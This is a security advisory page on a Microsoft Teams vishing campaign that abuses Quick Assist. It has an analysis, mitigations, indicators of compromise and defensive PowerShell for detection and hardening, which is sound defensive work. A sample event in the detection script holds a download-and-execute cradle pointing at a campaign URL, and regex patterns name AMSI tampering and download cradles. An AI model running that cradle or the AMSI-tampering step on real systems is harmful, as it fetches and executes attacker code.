
Quick, You Need Assistance!

Severity: Medium
Published: Mon Feb 02 2026 (02/02/2026, 10:52:24 UTC)
Source: AlienVault OTX General

Description

A Microsoft Teams voice-phishing campaign that abuses Quick Assist, Microsoft's built-in remote assistance tool, was tracked in September 2025. The operators pose as a help desk to obtain initial access, then enumerate the victim's group memberships and run a PowerShell script that downloads a command-and-control payload. The chain includes an AMSI bypass, encrypted communications, and a WebSocket-based remote access trojan. Multiple Microsoft 365 tenants with IT-themed subdomains were used to place the calls, alongside a set of IP addresses and domains for C2 infrastructure. The campaign overlaps with Storm-1811 and PhantomCaptcha activity, suggesting a complex cybercrime ecosystem rather than a single actor. The likely end goal is ransomware deployment; the attempts that were observed were blocked.

AI-Powered Analysis

AI analysis last updated: 02/02/2026, 11:16:01 UTC

Technical Analysis

The 'Quick, You Need Assistance!' campaign is a voice-phishing operation run over Microsoft Teams. The callers impersonate help desk staff and talk the target into starting a Quick Assist session, so the initial access is granted by the user rather than obtained through an exploit. Because Quick Assist is a signed Microsoft component that is present on most Windows installations, the session itself looks like ordinary support activity to endpoint tooling.

Once the attacker controls the desktop, the chain is conventional hands-on-keyboard tradecraft: enumerate the user's group memberships to understand what the account can reach, then run PowerShell that downloads and stages the command-and-control payload. That payload includes a WebSocket-based remote access trojan which keeps an encrypted channel open to the operators' infrastructure. Before the loader runs, the script tampers with AMSI (the Antimalware Scan Interface) so that the PowerShell content is not handed to the endpoint protection engine for scanning; this is what lets the download cradle and RAT stager execute without an AV detection, although behavioural EDR telemetry and PowerShell logging still record it.

The operators run several Microsoft 365 tenants whose subdomains are IT-themed, which makes the inbound Teams call look like it comes from an internal or contracted support organisation and lets them rotate tenants as they are reported. A range of IP addresses and domains serve as C2 endpoints. The tradecraft and infrastructure overlap with the Storm-1811 and PhantomCaptcha activity clusters, which points to a shared tooling and access-broker ecosystem rather than a single group; Storm-1811 in particular has previously been linked to Quick Assist abuse leading to ransomware.

Ransomware deployment is the suspected end state. The attempts observed in this campaign were blocked, so no ransomware impact has been confirmed on this page. The indicators below are the C2 IP addresses and domains, plus two URLs on campaign domains serving files named as PDFs; the page does not state whether those files are decoys or carry additional payload stages. The chain depends on social engineering, PowerShell, and the abuse of a legitimate remote assistance tool, so defences need to combine user-facing controls (call verification, restricting Quick Assist) with technical ones (script block logging, AMSI tamper detection, egress monitoring).
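The sequence above (AMSI tampering, a download cradle, group enumeration, a WebSocket client, and the campaign domains) is what a defender would look for in PowerShell Script Block Logging (Event ID 4104). The script below is an added example, not code from the Field Effect report or the OTX pulse: it scores each script block against generic behaviour signatures plus the domains from this page's IoC list. The signature tokens, weights, threshold and the constructed sample events are assumptions for illustration; the `Properties[2]` index is the ScriptBlockText field of a 4104 event.

```powershell
# Added example (not from the Field Effect report or the OTX pulse): scores
# PowerShell ScriptBlock Logging events (Event ID 4104) for the behaviours the
# campaign chains together. Signature tokens, weights and the threshold are
# assumptions for illustration; tune them before relying on them.

# Domains from the IoC list on this page.
$CampaignDomains = @(
    'aeobionix.com', 'aerobionix.com', 'flyskyenterprise.com', 'ibizers.com',
    'j4jobspk.com', 'khanvas.com', 'maxolutions243.com', 'mdbelaluddin.com',
    'prosearium.net'
)

# Generic behaviour signatures (assumed; not strings taken from the campaign).
# AmsiUtils / amsiInitFailed are the .NET type and field that most public AMSI
# tampering techniques reference, so their presence alone is a strong signal.
$Signatures = @(
    [pscustomobject]@{ Name = 'AMSI tamper';       Weight = 5; Pattern = 'AmsiUtils|amsiInitFailed|AmsiScanBuffer|AmsiOpenSession' }
    [pscustomobject]@{ Name = 'Download cradle';   Weight = 3; Pattern = 'DownloadString|DownloadFile|Invoke-WebRequest|Invoke-RestMethod|Net\.WebClient' }
    [pscustomobject]@{ Name = 'Inline execution';  Weight = 2; Pattern = '\biex\b|Invoke-Expression' }
    [pscustomobject]@{ Name = 'Group enumeration'; Weight = 2; Pattern = 'net\s+(local)?group|whoami\s+/groups|Get-ADGroupMember|Get-ADPrincipalGroupMembership' }
    [pscustomobject]@{ Name = 'WebSocket client';  Weight = 3; Pattern = 'ClientWebSocket|wss://' }
    [pscustomobject]@{ Name = 'Campaign domain';   Weight = 5; Pattern = ($CampaignDomains | ForEach-Object { [regex]::Escape($_) }) -join '|' }
)

# Score one script block: sum of the weights of every signature it matches.
# -match is case-insensitive by default, which is what we want here.
function Get-ScriptBlockRisk {
    param([Parameter(Mandatory)][string]$ScriptText)
    $hits  = @($Signatures | Where-Object { $ScriptText -match $_.Pattern })
    $score = 0
    foreach ($h in $hits) { $score += $h.Weight }
    [pscustomobject]@{
        Score   = $score
        Matches = @($hits | ForEach-Object { $_.Name })
    }
}

# Report every event whose score reaches the threshold.
function Find-SuspiciousScriptBlocks {
    param(
        [Parameter(Mandatory)][AllowEmptyCollection()][object[]]$Events, # objects with TimeCreated and ScriptText
        [int]$Threshold = 5    # assumed: one high-weight hit, or several low-weight ones
    )
    foreach ($ev in $Events) {
        $risk = Get-ScriptBlockRisk -ScriptText $ev.ScriptText
        if ($risk.Score -ge $Threshold) {
            [pscustomobject]@{
                Time    = $ev.TimeCreated
                Score   = $risk.Score
                Matches = $risk.Matches -join ', '
                Preview = $ev.ScriptText.Substring(0, [Math]::Min(90, $ev.ScriptText.Length))
            }
        }
    }
}

# Live path: 4104 events from the local Operational log. Requires Script Block
# Logging to be enabled; Properties[2] of a 4104 event is ScriptBlockText.
function Get-RecentScriptBlockEvents {
    param([int]$Hours = 24)
    Get-WinEvent -FilterHashtable @{
        LogName   = 'Microsoft-Windows-PowerShell/Operational'
        Id        = 4104
        StartTime = (Get-Date).AddHours(-$Hours)
    } -ErrorAction SilentlyContinue | ForEach-Object {
        [pscustomobject]@{ TimeCreated = $_.TimeCreated; ScriptText = [string]$_.Properties[2].Value }
    }
}

# Constructed sample events (not real telemetry) so the scoring runs offline.
# The second one references the AMSI type and a campaign URL but the tamper
# step itself is deliberately elided.
$sampleEvents = @(
    [pscustomobject]@{ TimeCreated = Get-Date; ScriptText = 'Get-ChildItem C:\Temp | Sort-Object Length' }
    [pscustomobject]@{ TimeCreated = Get-Date; ScriptText = '$t=[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils"); <# tamper step elided #> iex (New-Object Net.WebClient).DownloadString("https://prosearium.net/setting.pdf")' }
    [pscustomobject]@{ TimeCreated = Get-Date; ScriptText = 'whoami /groups; net group "Domain Admins" /domain' }
)
Find-SuspiciousScriptBlocks -Events $sampleEvents | Format-Table -AutoSize
# Against live data: Find-SuspiciousScriptBlocks -Events @(Get-RecentScriptBlockEvents)
```

With the sample input only the second event is reported (score 15: AMSI tamper, download cradle, inline execution, campaign domain). The third event, group enumeration on its own, scores 2 and stays below the threshold; that is deliberate, because `whoami /groups` is common in legitimate admin work. In a SIEM the better move is to lower the threshold only for hosts where `QuickAssist.exe` was running in the same window, which is the correlation this campaign's chain invites.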

Potential Impact

For European organizations the exposed population is IT and help desk staff, and any user who would accept a Teams call from what looks like a support tenant. A successful call gives the attacker an interactive desktop session under the victim's identity, from which credential harvesting, lateral movement and ransomware staging follow. Because the access vehicle is Quick Assist rather than malware, there is no dropped executable to flag at the first stage, and the intrusion can run for some time before anyone notices.

Confidentiality is at risk from exfiltration over the RAT's encrypted channel; integrity and availability are at risk if the suspected ransomware stage is reached, with the usual operational, financial and reputational consequences. Organisations that rely heavily on Microsoft 365 and Teams, which is the norm across Europe, are the natural target set, since the lure depends on an inbound Teams call looking routine. The AMSI bypass and TLS-wrapped WebSocket C2 reduce what signature-based AV and payload inspection will catch, so detection shifts to PowerShell logging, EDR behavioural telemetry and DNS/proxy visibility.

No ransomware infection has been confirmed in this campaign, but the chain is one short step from it, and the risk is highest in sectors with critical infrastructure or sensitive data. The human factor is the decisive vulnerability here. Overall, European organizations face a medium to high operational risk, concentrated in environments where Quick Assist is available to every user and Teams accepts calls from any external tenant.

Mitigation Recommendations

1. Run targeted awareness training on voice phishing and help desk impersonation for IT and help desk staff and for the wider user base. State the rule plainly: the real help desk never asks a user to open Quick Assist during an unsolicited Teams call. Publish a call-back number so users can verify any such request.
2. Restrict Quick Assist. Uninstall it where it is not used (it ships as an optional Windows capability or as a Store app) or block QuickAssist.exe with AppLocker or WDAC. Where remote support is required, use a managed tool that records sessions and binds them to authenticated technician identities. Quick Assist itself has no per-session MFA, so the effective controls are its availability and the process around it.
3. Turn on PowerShell Script Block Logging and Module Logging (Event IDs 4104 and 4103), forward them to the SIEM, and restrict unsigned or obfuscated scripts through execution policy and Constrained Language Mode.
4. Deploy EDR that alerts on AMSI tampering (script blocks touching AmsiUtils or amsiInitFailed) and on download cradles, and correlate QuickAssist.exe sessions with PowerShell or cmd launches on the same host in the following minutes.
5. Block and alert on the IP addresses, domains and URLs listed below. Look for HTTP Upgrade: websocket requests to untrusted destinations; since the channel is TLS-wrapped, DNS, TLS SNI and proxy logs will see it when payload inspection cannot.
6. Tighten Teams external access. Conditional Access governs sign-in to your own tenant and does not filter inbound federated calls; use the Teams external access (federation) settings to allow only trusted domains and block personal or consumer Teams accounts.
7. Review and audit Microsoft 365 tenant configuration and permissions regularly to detect unauthorised changes or suspicious activity.
8. Keep threat intelligence feeds current and load the IoCs from this campaign into blocking and detection tooling.
9. Prepare and exercise incident response plans that cover remote access tool abuse and ransomware scenarios.
10. Make it easy to report suspicious Teams calls or remote assistance requests to the security team, and act on those reports quickly.
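Items 2, 3, 6 and 8 above can be checked and, for the endpoint pieces, enforced from a PowerShell session. The script below is an added example, not code from the Field Effect report or the OTX pulse. It assumes Windows PowerShell 5.1 run as administrator for the endpoint functions; the Teams function assumes the MicrosoftTeams module with an existing Connect-MicrosoftTeams session. The Quick Assist capability and Store package names are Microsoft's; the choice of checks and the finding text are assumptions for illustration.

```powershell
# Added example (not from the Field Effect report or the OTX pulse): local
# hardening and audit for the recommendations above. Run elevated in Windows
# PowerShell 5.1 (the Appx cmdlets are not native to PowerShell 7).

# 2. Remove Quick Assist where it is not needed. It may exist as a Windows
#    optional capability (older builds) and/or as a Store app (current builds).
function Remove-QuickAssist {
    [CmdletBinding(SupportsShouldProcess)]
    param()
    $caps = Get-WindowsCapability -Online -Name 'App.Support.QuickAssist*' |
            Where-Object State -eq 'Installed'
    foreach ($cap in $caps) {
        if ($PSCmdlet.ShouldProcess($cap.Name, 'Remove-WindowsCapability')) {
            Remove-WindowsCapability -Online -Name $cap.Name | Out-Null
        }
    }
    $pkgs = Get-AppxPackage -AllUsers -Name 'MicrosoftCorporationII.QuickAssist'
    foreach ($pkg in $pkgs) {
        if ($PSCmdlet.ShouldProcess($pkg.PackageFullName, 'Remove-AppxPackage')) {
            Remove-AppxPackage -AllUsers -Package $pkg.PackageFullName
        }
    }
}

# 3. Ensure Script Block Logging is enforced by policy. This is the registry
#    value the "Turn on PowerShell Script Block Logging" GPO writes.
function Enable-ScriptBlockLogging {
    [CmdletBinding(SupportsShouldProcess)]
    param()
    $key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
    $current = (Get-ItemProperty -Path $key -Name EnableScriptBlockLogging -ErrorAction SilentlyContinue).EnableScriptBlockLogging
    if ($current -eq 1) { return 'ScriptBlockLogging: already enabled' }
    if ($PSCmdlet.ShouldProcess($key, 'Set EnableScriptBlockLogging=1')) {
        New-Item -Path $key -Force | Out-Null
        New-ItemProperty -Path $key -Name EnableScriptBlockLogging -PropertyType DWord -Value 1 -Force | Out-Null
    }
    return 'ScriptBlockLogging: enabled'
}

# 8. Quick local sweep: has this host resolved any domain from the IoC list?
$CampaignDomains = @(
    'aeobionix.com', 'aerobionix.com', 'flyskyenterprise.com', 'ibizers.com',
    'j4jobspk.com', 'khanvas.com', 'maxolutions243.com', 'mdbelaluddin.com',
    'prosearium.net'
)
function Find-CampaignDomainsInDnsCache {
    Get-DnsClientCache -ErrorAction SilentlyContinue | Where-Object {
        $entry = $_.Entry.ToLower()
        ($CampaignDomains | Where-Object { $entry -eq $_ -or $entry.EndsWith(".$_") }).Count -gt 0
    } | Select-Object Entry, Data, TimeToLive
}

# 6. Teams external access posture. Conditional Access does not filter inbound
#    federated chats and calls; the tenant federation configuration does.
#    Requires: Import-Module MicrosoftTeams; Connect-MicrosoftTeams
function Get-TeamsExternalAccessFindings {
    $fed = Get-CsTenantFederationConfiguration
    [pscustomobject]@{
        AllowFederatedUsers = $fed.AllowFederatedUsers
        AllowedDomains      = $fed.AllowedDomains      # an allow list is the goal, not "all known domains"
        BlockedDomains      = $fed.BlockedDomains
        AllowTeamsConsumer  = $fed.AllowTeamsConsumer
        Finding             = if ($fed.AllowTeamsConsumer) { 'Personal Teams accounts can call in; disable unless required' } else { 'OK' }
    }
}

# Usage: preview first, then apply on the endpoint side.
Remove-QuickAssist -WhatIf
Enable-ScriptBlockLogging -WhatIf
Find-CampaignDomainsInDnsCache
# Get-TeamsExternalAccessFindings   # after Connect-MicrosoftTeams
```

Both mutating functions support -WhatIf, so the script can be run read-only on a pilot group before it is pushed through Intune or a scheduled task. The DNS cache check is only a spot check on one host; the authoritative sweep is the same domain list applied to the resolver or proxy logs.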


Technical Details

Author: AlienVault
TLP: WHITE
Reference: https://fieldeffect.com/blog/quick-you-need-assistance
Adversary: none attributed
Pulse ID: 698081e8c82411d000808025
Threat Score: none

Indicators of Compromise

IP addresses

149.154.158.86
164.173.252.162
162.252.172.102
162.252.172.16
162.252.172.21
162.252.172.245
162.252.172.74
162.252.172.83
162.252.173.45
162.252.174.119
165.172.252.162

Domains

aeobionix.com
aerobionix.com
flyskyenterprise.com
ibizers.com
j4jobspk.com
khanvas.com
maxolutions243.com
mdbelaluddin.com
prosearium.net

URLs

https://aerobionix.com/generation.pdf
https://prosearium.net/setting.pdf

Threat ID: 698083b8f9fa50a62f37054c

Added to database: 2/2/2026, 11:00:08 AM

Last enriched: 2/2/2026, 11:16:01 AM

Last updated: 2/7/2026, 3:11:36 AM

